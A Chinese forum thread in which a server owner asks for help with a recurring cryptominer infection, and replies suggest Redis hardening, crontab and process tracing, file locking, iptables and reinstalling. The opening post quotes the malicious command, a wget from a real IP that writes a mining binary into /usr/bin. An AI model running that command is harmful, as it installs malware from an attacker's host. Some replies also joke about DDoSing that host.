求助，每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬

• 資深大佬 : sadwin

  有在跑 redis 吗？ 有可能是 redis 被黑了

• 資深大佬 : Hurriance

  redis 上密码

• 資深大佬 : renmu

  cron 里没有?最好的方法就是重装系统

• 資深大佬 : claysec

  没有重要东西就直接重装系统。

• 資深大佬 : sadwin

  可以看下这个 https://www.v2ex.com/t/623847

• 資深大佬 : GGGG430

  首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
  其次可以通过 alias 重命名 wget 为其他命令

• 資深大佬 : cnzjl

  最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令

• 資深大佬 : ik

  建议重装，想排查问题可以先
  > /usr/bin/uvggee
  chmod 000 /usr/bin/uvggee
  chattr +i /usr/bin/uvggee
  然后再排查问题

• 資深大佬 : imdong

  非专业，笨笨的方法：

  比如自己写一个 shell 命名为 wget，然后在里面获取一些父进程信息？
  然后用这个 shell 替换(覆盖) wget ？？

• 資深大佬 : won

  1 top 到进程号
  2 ll 到执行位置
  3 rm 掉
  4 crontab 里删除，并添加一个 1 分钟守护
  5 restart

• 資深大佬 : i999999

  建议重装系统，没办法重装的话可以把 wget 和 curl 工具重命名

• 資深大佬 : guog

  七天了，主这个问题还没解决？大家给你的方案你试过了吗

• 資深大佬 : Rxianbei

  @cnzjl 老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis，但是没有公网，装了都大半年了，想来也后怕，请问应该怎么排查？

• 主 資深大佬 : ying5201314

  试过了，主要不能重装，不然早解决

• 主 資深大佬 : ying5201314

  试过了，主要不能重装，不然早解决 1
  @guog

• 資深大佬 : defunct9

  开 ssh，让我上去看看

• 資深大佬 : xupefei

  还有个可能是服务器跑了 yarn 。

• 資深大佬 : Guys

  先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.

• 資深大佬 : musi

  你在 v2 上发个求 d 帖把那个服务器 d 挂就好了

• 資深大佬 : xingheng

  pstree 找到是哪个主进程启动的 wget，然后删除主进程的执行文件就行了吧。难道还有守护进程？？尝试 watch+pstree 。

• 資深大佬 : patx

  发到全球 ddos 论坛上去

• 資深大佬 : JustSong

  可以用防火墙进行限制么

• 資深大佬 : Hades300

  用 iptables drop 包就完事了

• 資深大佬 : msg7086

  既然能写入 /usr/bin，那说明别人已经拿到了 root 权限，那从内核到系统文件，所有的程序都可能会被换掉，你不重装难道留着过劳动节么。

• 資深大佬 : realpg

  我猜你是 centos

• 資深大佬 : cnzjl

  @Rxianbei 排查下 cup 占用高的进程, 看看有没有可疑的 vbs 脚本,是否为远程下载的脚本~

• 資深大佬 : zhao305149619

  这种一般有 cron 的定时脚本，还有就是会有一个低 cpu 利用率的 deamon 的进程不易被发现，所以有时候发现把 cron 停掉之后过一会还是会出现。